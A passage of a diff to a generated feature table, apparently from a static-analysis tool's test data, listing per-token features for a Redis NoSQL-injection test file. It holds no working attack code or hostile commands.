contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:43:18:43:25 | setAsync | enclosingFunctionBody | req res key req body key client set key value setAsync promisify client set bind client foo1 setAsync key value client setAsync promisify client set foo2 client setAsync key value client unrelated promisify foo3 client unrelated key value unrelated promisify client foobar bind client foo4 unrelated key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:43:18:43:25 | setAsync | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:43:18:43:25 | setAsync | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:43:18:43:39 | exceptional return of setAsyn ... value") | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:43:18:43:39 | exceptional return of setAsyn ... value") | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:43:18:43:39 | exceptional return of setAsyn ... value") | enclosingFunctionBody | req res key req body key client set key value setAsync promisify client set bind client foo1 setAsync key value client setAsync promisify client set foo2 client setAsync key value client unrelated promisify foo3 client unrelated key value unrelated promisify client foobar bind client foo4 unrelated key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:43:18:43:39 | exceptional return of setAsyn ... value") | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:43:18:43:39 | exceptional return of setAsyn ... value") | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:43:18:43:39 | setAsyn ... value") | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:43:18:43:39 | setAsyn ... value") | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:43:18:43:39 | setAsyn ... value") | enclosingFunctionBody | req res key req body key client set key value setAsync promisify client set bind client foo1 setAsync key value client setAsync promisify client set foo2 client setAsync key value client unrelated promisify foo3 client unrelated key value unrelated promisify client foobar bind client foo4 unrelated key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:43:18:43:39 | setAsyn ... value") | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:43:18:43:39 | setAsyn ... value") | fileImports | body-parser express redis util | | autogenerated/NosqlAndSqlInjection/untyped/redis.js:43:27:43:29 | key | CalleeFlexibleAccessPath | setAsync | | autogenerated/NosqlAndSqlInjection/untyped/redis.js:43:27:43:29 | key | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/redis.js:43:27:43:29 | key | calleeImports | util | @@ -4229,6 +20264,47 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/redis.js:43:32:43:38 | "value" | enclosingFunctionBody | req res key req body key client set key value setAsync promisify client set bind client foo1 setAsync key value client setAsync promisify client set foo2 client setAsync key value client unrelated promisify foo3 client unrelated key value unrelated promisify client foobar bind client foo4 unrelated key value | | autogenerated/NosqlAndSqlInjection/untyped/redis.js:43:32:43:38 | "value" | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/redis.js:43:32:43:38 | "value" | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:45:5:45:10 | client | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:45:5:45:10 | client | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:45:5:45:10 | client | enclosingFunctionBody | req res key req body key client set key value setAsync promisify client set bind client foo1 setAsync key value client setAsync promisify client set foo2 client setAsync key value client unrelated promisify foo3 client unrelated key value unrelated promisify client foobar bind client foo4 unrelated key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:45:5:45:10 | client | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:45:5:45:10 | client | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:45:5:45:19 | client.setAsync | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:45:5:45:19 | client.setAsync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:45:5:45:19 | client.setAsync | enclosingFunctionBody | req res key req body key client set key value setAsync promisify client set bind client foo1 setAsync key value client setAsync promisify client set foo2 client setAsync key value client unrelated promisify foo3 client unrelated key value unrelated promisify client foobar bind client foo4 unrelated key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:45:5:45:19 | client.setAsync | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:45:5:45:19 | client.setAsync | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:45:5:45:43 | client. ... nt.set) | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:45:5:45:43 | client. ... nt.set) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:45:5:45:43 | client. ... nt.set) | enclosingFunctionBody | req res key req body key client set key value setAsync promisify client set bind client foo1 setAsync key value client setAsync promisify client set foo2 client setAsync key value client unrelated promisify foo3 client unrelated key value unrelated promisify client foobar bind client foo4 unrelated key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:45:5:45:43 | client. ... nt.set) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:45:5:45:43 | client. ... nt.set) | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:45:12:45:19 | setAsync | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:45:12:45:19 | setAsync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:45:12:45:19 | setAsync | enclosingFunctionBody | req res key req body key client set key value setAsync promisify client set bind client foo1 setAsync key value client setAsync promisify client set foo2 client setAsync key value client unrelated promisify foo3 client unrelated key value unrelated promisify client foobar bind client foo4 unrelated key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:45:12:45:19 | setAsync | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:45:12:45:19 | setAsync | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:45:23:45:31 | promisify | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:45:23:45:31 | promisify | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:45:23:45:31 | promisify | enclosingFunctionBody | req res key req body key client set key value setAsync promisify client set bind client foo1 setAsync key value client setAsync promisify client set foo2 client setAsync key value client unrelated promisify foo3 client unrelated key value unrelated promisify client foobar bind client foo4 unrelated key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:45:23:45:31 | promisify | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:45:23:45:31 | promisify | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:45:23:45:43 | exceptional return of promisi ... nt.set) | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:45:23:45:43 | exceptional return of promisi ... nt.set) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:45:23:45:43 | exceptional return of promisi ... nt.set) | enclosingFunctionBody | req res key req body key client set key value setAsync promisify client set bind client foo1 setAsync key value client setAsync promisify client set foo2 client setAsync key value client unrelated promisify foo3 client unrelated key value unrelated promisify client foobar bind client foo4 unrelated key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:45:23:45:43 | exceptional return of promisi ... nt.set) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:45:23:45:43 | exceptional return of promisi ... nt.set) | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:45:23:45:43 | promisi ... nt.set) | assignedToPropName | setAsync | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:45:23:45:43 | promisi ... nt.set) | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:45:23:45:43 | promisi ... nt.set) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:45:23:45:43 | promisi ... nt.set) | enclosingFunctionBody | req res key req body key client set key value setAsync promisify client set bind client foo1 setAsync key value client setAsync promisify client set foo2 client setAsync key value client unrelated promisify foo3 client unrelated key value unrelated promisify client foobar bind client foo4 unrelated key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:45:23:45:43 | promisi ... nt.set) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:45:23:45:43 | promisi ... nt.set) | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:45:33:45:38 | client | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:45:33:45:38 | client | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:45:33:45:38 | client | enclosingFunctionBody | req res key req body key client set key value setAsync promisify client set bind client foo1 setAsync key value client setAsync promisify client set foo2 client setAsync key value client unrelated promisify foo3 client unrelated key value unrelated promisify client foobar bind client foo4 unrelated key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:45:33:45:38 | client | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:45:33:45:38 | client | fileImports | body-parser express redis util | | autogenerated/NosqlAndSqlInjection/untyped/redis.js:45:33:45:42 | client.set | CalleeFlexibleAccessPath | promisify | | autogenerated/NosqlAndSqlInjection/untyped/redis.js:45:33:45:42 | client.set | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/redis.js:45:33:45:42 | client.set | calleeImports | util | @@ -4237,6 +20313,46 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/redis.js:45:33:45:42 | client.set | enclosingFunctionBody | req res key req body key client set key value setAsync promisify client set bind client foo1 setAsync key value client setAsync promisify client set foo2 client setAsync key value client unrelated promisify foo3 client unrelated key value unrelated promisify client foobar bind client foo4 unrelated key value | | autogenerated/NosqlAndSqlInjection/untyped/redis.js:45:33:45:42 | client.set | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/redis.js:45:33:45:42 | client.set | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:45:40:45:42 | set | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:45:40:45:42 | set | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:45:40:45:42 | set | enclosingFunctionBody | req res key req body key client set key value setAsync promisify client set bind client foo1 setAsync key value client setAsync promisify client set foo2 client setAsync key value client unrelated promisify foo3 client unrelated key value unrelated promisify client foobar bind client foo4 unrelated key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:45:40:45:42 | set | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:45:40:45:42 | set | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:46:11:46:14 | foo2 | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:46:11:46:14 | foo2 | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:46:11:46:14 | foo2 | enclosingFunctionBody | req res key req body key client set key value setAsync promisify client set bind client foo1 setAsync key value client setAsync promisify client set foo2 client setAsync key value client unrelated promisify foo3 client unrelated key value unrelated promisify client foobar bind client foo4 unrelated key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:46:11:46:14 | foo2 | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:46:11:46:14 | foo2 | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:46:11:46:46 | foo2 = ... value") | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:46:11:46:46 | foo2 = ... value") | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:46:11:46:46 | foo2 = ... value") | enclosingFunctionBody | req res key req body key client set key value setAsync promisify client set bind client foo1 setAsync key value client setAsync promisify client set foo2 client setAsync key value client unrelated promisify foo3 client unrelated key value unrelated promisify client foobar bind client foo4 unrelated key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:46:11:46:46 | foo2 = ... value") | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:46:11:46:46 | foo2 = ... value") | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:46:18:46:23 | client | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:46:18:46:23 | client | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:46:18:46:23 | client | enclosingFunctionBody | req res key req body key client set key value setAsync promisify client set bind client foo1 setAsync key value client setAsync promisify client set foo2 client setAsync key value client unrelated promisify foo3 client unrelated key value unrelated promisify client foobar bind client foo4 unrelated key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:46:18:46:23 | client | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:46:18:46:23 | client | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:46:18:46:32 | client.setAsync | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:46:18:46:32 | client.setAsync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:46:18:46:32 | client.setAsync | enclosingFunctionBody | req res key req body key client set key value setAsync promisify client set bind client foo1 setAsync key value client setAsync promisify client set foo2 client setAsync key value client unrelated promisify foo3 client unrelated key value unrelated promisify client foobar bind client foo4 unrelated key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:46:18:46:32 | client.setAsync | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:46:18:46:32 | client.setAsync | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:46:18:46:46 | client. ... value") | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:46:18:46:46 | client. ... value") | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:46:18:46:46 | client. ... value") | enclosingFunctionBody | req res key req body key client set key value setAsync promisify client set bind client foo1 setAsync key value client setAsync promisify client set foo2 client setAsync key value client unrelated promisify foo3 client unrelated key value unrelated promisify client foobar bind client foo4 unrelated key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:46:18:46:46 | client. ... value") | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:46:18:46:46 | client. ... value") | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:46:18:46:46 | exceptional return of client. ... value") | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:46:18:46:46 | exceptional return of client. ... value") | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:46:18:46:46 | exceptional return of client. ... value") | enclosingFunctionBody | req res key req body key client set key value setAsync promisify client set bind client foo1 setAsync key value client setAsync promisify client set foo2 client setAsync key value client unrelated promisify foo3 client unrelated key value unrelated promisify client foobar bind client foo4 unrelated key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:46:18:46:46 | exceptional return of client. ... value") | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:46:18:46:46 | exceptional return of client. ... value") | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:46:25:46:32 | setAsync | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:46:25:46:32 | setAsync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:46:25:46:32 | setAsync | enclosingFunctionBody | req res key req body key client set key value setAsync promisify client set bind client foo1 setAsync key value client setAsync promisify client set foo2 client setAsync key value client unrelated promisify foo3 client unrelated key value unrelated promisify client foobar bind client foo4 unrelated key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:46:25:46:32 | setAsync | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:46:25:46:32 | setAsync | fileImports | body-parser express redis util | | autogenerated/NosqlAndSqlInjection/untyped/redis.js:46:34:46:36 | key | CalleeFlexibleAccessPath | client.setAsync | | autogenerated/NosqlAndSqlInjection/untyped/redis.js:46:34:46:36 | key | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/redis.js:46:34:46:36 | key | calleeImports | redis | @@ -4255,6 +20371,47 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/redis.js:46:39:46:45 | "value" | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/redis.js:46:39:46:45 | "value" | fileImports | body-parser express redis util | | autogenerated/NosqlAndSqlInjection/untyped/redis.js:46:39:46:45 | "value" | receiverName | client | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:48:5:48:10 | client | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:48:5:48:10 | client | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:48:5:48:10 | client | enclosingFunctionBody | req res key req body key client set key value setAsync promisify client set bind client foo1 setAsync key value client setAsync promisify client set foo2 client setAsync key value client unrelated promisify foo3 client unrelated key value unrelated promisify client foobar bind client foo4 unrelated key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:48:5:48:10 | client | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:48:5:48:10 | client | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:48:5:48:20 | client.unrelated | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:48:5:48:20 | client.unrelated | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:48:5:48:20 | client.unrelated | enclosingFunctionBody | req res key req body key client set key value setAsync promisify client set bind client foo1 setAsync key value client setAsync promisify client set foo2 client setAsync key value client unrelated promisify foo3 client unrelated key value unrelated promisify client foobar bind client foo4 unrelated key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:48:5:48:20 | client.unrelated | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:48:5:48:20 | client.unrelated | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:48:5:48:42 | client. ... => {}) | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:48:5:48:42 | client. ... => {}) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:48:5:48:42 | client. ... => {}) | enclosingFunctionBody | req res key req body key client set key value setAsync promisify client set bind client foo1 setAsync key value client setAsync promisify client set foo2 client setAsync key value client unrelated promisify foo3 client unrelated key value unrelated promisify client foobar bind client foo4 unrelated key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:48:5:48:42 | client. ... => {}) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:48:5:48:42 | client. ... => {}) | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:48:12:48:20 | unrelated | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:48:12:48:20 | unrelated | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:48:12:48:20 | unrelated | enclosingFunctionBody | req res key req body key client set key value setAsync promisify client set bind client foo1 setAsync key value client setAsync promisify client set foo2 client setAsync key value client unrelated promisify foo3 client unrelated key value unrelated promisify client foobar bind client foo4 unrelated key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:48:12:48:20 | unrelated | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:48:12:48:20 | unrelated | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:48:24:48:32 | promisify | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:48:24:48:32 | promisify | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:48:24:48:32 | promisify | enclosingFunctionBody | req res key req body key client set key value setAsync promisify client set bind client foo1 setAsync key value client setAsync promisify client set foo2 client setAsync key value client unrelated promisify foo3 client unrelated key value unrelated promisify client foobar bind client foo4 unrelated key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:48:24:48:32 | promisify | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:48:24:48:32 | promisify | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:48:24:48:42 | exceptional return of promisify(() => {}) | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:48:24:48:42 | exceptional return of promisify(() => {}) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:48:24:48:42 | exceptional return of promisify(() => {}) | enclosingFunctionBody | req res key req body key client set key value setAsync promisify client set bind client foo1 setAsync key value client setAsync promisify client set foo2 client setAsync key value client unrelated promisify foo3 client unrelated key value unrelated promisify client foobar bind client foo4 unrelated key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:48:24:48:42 | exceptional return of promisify(() => {}) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:48:24:48:42 | exceptional return of promisify(() => {}) | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:48:24:48:42 | promisify(() => {}) | assignedToPropName | unrelated | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:48:24:48:42 | promisify(() => {}) | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:48:24:48:42 | promisify(() => {}) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:48:24:48:42 | promisify(() => {}) | enclosingFunctionBody | req res key req body key client set key value setAsync promisify client set bind client foo1 setAsync key value client setAsync promisify client set foo2 client setAsync key value client unrelated promisify foo3 client unrelated key value unrelated promisify client foobar bind client foo4 unrelated key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:48:24:48:42 | promisify(() => {}) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:48:24:48:42 | promisify(() => {}) | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:48:34:48:41 | 'arguments' object of anonymous function | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:48:34:48:41 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:48:34:48:41 | 'arguments' object of anonymous function | enclosingFunctionBody | req res key req body key client set key value setAsync promisify client set bind client foo1 setAsync key value client setAsync promisify client set foo2 client setAsync key value client unrelated promisify foo3 client unrelated key value unrelated promisify client foobar bind client foo4 unrelated key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:48:34:48:41 | 'arguments' object of anonymous function | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:48:34:48:41 | 'arguments' object of anonymous function | fileImports | body-parser express redis util | | autogenerated/NosqlAndSqlInjection/untyped/redis.js:48:34:48:41 | () => {} | CalleeFlexibleAccessPath | promisify | | autogenerated/NosqlAndSqlInjection/untyped/redis.js:48:34:48:41 | () => {} | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/redis.js:48:34:48:41 | () => {} | calleeImports | util | @@ -4263,6 +20420,51 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/redis.js:48:34:48:41 | () => {} | enclosingFunctionBody | req res key req body key client set key value setAsync promisify client set bind client foo1 setAsync key value client setAsync promisify client set foo2 client setAsync key value client unrelated promisify foo3 client unrelated key value unrelated promisify client foobar bind client foo4 unrelated key value | | autogenerated/NosqlAndSqlInjection/untyped/redis.js:48:34:48:41 | () => {} | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/redis.js:48:34:48:41 | () => {} | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:48:34:48:41 | exceptional return of anonymous function | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:48:34:48:41 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:48:34:48:41 | exceptional return of anonymous function | enclosingFunctionBody | req res key req body key client set key value setAsync promisify client set bind client foo1 setAsync key value client setAsync promisify client set foo2 client setAsync key value client unrelated promisify foo3 client unrelated key value unrelated promisify client foobar bind client foo4 unrelated key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:48:34:48:41 | exceptional return of anonymous function | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:48:34:48:41 | exceptional return of anonymous function | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:48:34:48:41 | return of anonymous function | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:48:34:48:41 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:48:34:48:41 | return of anonymous function | enclosingFunctionBody | req res key req body key client set key value setAsync promisify client set bind client foo1 setAsync key value client setAsync promisify client set foo2 client setAsync key value client unrelated promisify foo3 client unrelated key value unrelated promisify client foobar bind client foo4 unrelated key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:48:34:48:41 | return of anonymous function | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:48:34:48:41 | return of anonymous function | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:49:11:49:14 | foo3 | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:49:11:49:14 | foo3 | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:49:11:49:14 | foo3 | enclosingFunctionBody | req res key req body key client set key value setAsync promisify client set bind client foo1 setAsync key value client setAsync promisify client set foo2 client setAsync key value client unrelated promisify foo3 client unrelated key value unrelated promisify client foobar bind client foo4 unrelated key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:49:11:49:14 | foo3 | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:49:11:49:14 | foo3 | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:49:11:49:47 | foo3 = ... value") | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:49:11:49:47 | foo3 = ... value") | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:49:11:49:47 | foo3 = ... value") | enclosingFunctionBody | req res key req body key client set key value setAsync promisify client set bind client foo1 setAsync key value client setAsync promisify client set foo2 client setAsync key value client unrelated promisify foo3 client unrelated key value unrelated promisify client foobar bind client foo4 unrelated key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:49:11:49:47 | foo3 = ... value") | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:49:11:49:47 | foo3 = ... value") | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:49:18:49:23 | client | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:49:18:49:23 | client | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:49:18:49:23 | client | enclosingFunctionBody | req res key req body key client set key value setAsync promisify client set bind client foo1 setAsync key value client setAsync promisify client set foo2 client setAsync key value client unrelated promisify foo3 client unrelated key value unrelated promisify client foobar bind client foo4 unrelated key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:49:18:49:23 | client | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:49:18:49:23 | client | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:49:18:49:33 | client.unrelated | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:49:18:49:33 | client.unrelated | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:49:18:49:33 | client.unrelated | 